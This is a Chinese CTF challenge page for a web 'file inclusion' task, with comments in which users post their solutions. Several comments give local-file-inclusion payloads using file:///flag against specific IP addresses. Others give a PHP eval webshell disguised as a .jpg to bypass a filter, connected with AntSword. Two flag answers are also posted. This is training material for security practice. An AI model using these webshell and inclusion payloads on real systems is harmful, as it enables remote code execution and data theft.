文件包含2WEB 未解决

分数: 35 金币: 4
题目作者: 未知
一  血: dotast
一血奖励: 3金币
解  决: 3151
提  示: 文件包含
描  述:
文件包含2
评论
CHLing 3月前

http://114.67.175.224:18550/index.php?file=//flag

回复 0

qiusheng 6月前

1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX

回复 0

xiaoxiao972521 7月前

虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php

回复 3
冯飞99 7月前

绕来绕去看到你的评论一把过

回复 0

zzccbb2005 11月前

http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}

回复 1

109张某 1年前

这个题一句话传好像有些问题,我传了一堆,就只有下面仁兄的file:///flag方法成功了

回复 0
asd+1024 7月前

传木马的话,用<script language='php'>@eval($_POST['asd']);</script>然后,文件格式.jpg,在文件包含就可以了,file:///flag确实简单

回复 0

不会编程的崽 1年前

<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可

回复 0

2728462336 1年前

文件上传+文件包含

回复 1

wxy1343 1年前

flag{9be4acf19dc430e5ba2973dbb72f371d}

回复 0

⎝ZJJARY 1年前

真的无语了 连上马找不到flag 删flag的人马亖了

回复 2

dtm 1年前

使用file协议读取文件内容,index.php?file=file:///flag得到flag

回复 0
baianquanzu 1年前

@Striker123456 因为原本的协议是file://但是flag这个文件前面需要一个/

回复 4

Striker123456 1年前

为什么是三个斜杠呢

回复 0

WriteUp

image
harry

4 金币

评分(5)

解题动态

tabwux 攻破了该题 3小时前
auserzj 攻破了该题 8小时前
17383417036 攻破了该题 9小时前
bupt小白 攻破了该题 1天前
ocean9499 攻破了该题 1天前
tytu 攻破了该题 3天前
danel 攻破了该题 3天前
ctflittlewhite 攻破了该题 3天前
jackflank 攻破了该题 3天前
3521326029 攻破了该题 4天前
limuzi111 攻破了该题 5天前
qinyinqiqu 攻破了该题 5天前
xianbangz 攻破了该题 5天前
18259750065 攻破了该题 7天前
cuso4sean 攻破了该题 8天前
apo000 攻破了该题 9天前
找不到就寄 攻破了该题 11天前
wangqi666 攻破了该题 11天前
风雨兼程 攻破了该题 11天前
adminasdfg 攻破了该题 12天前
问题反馈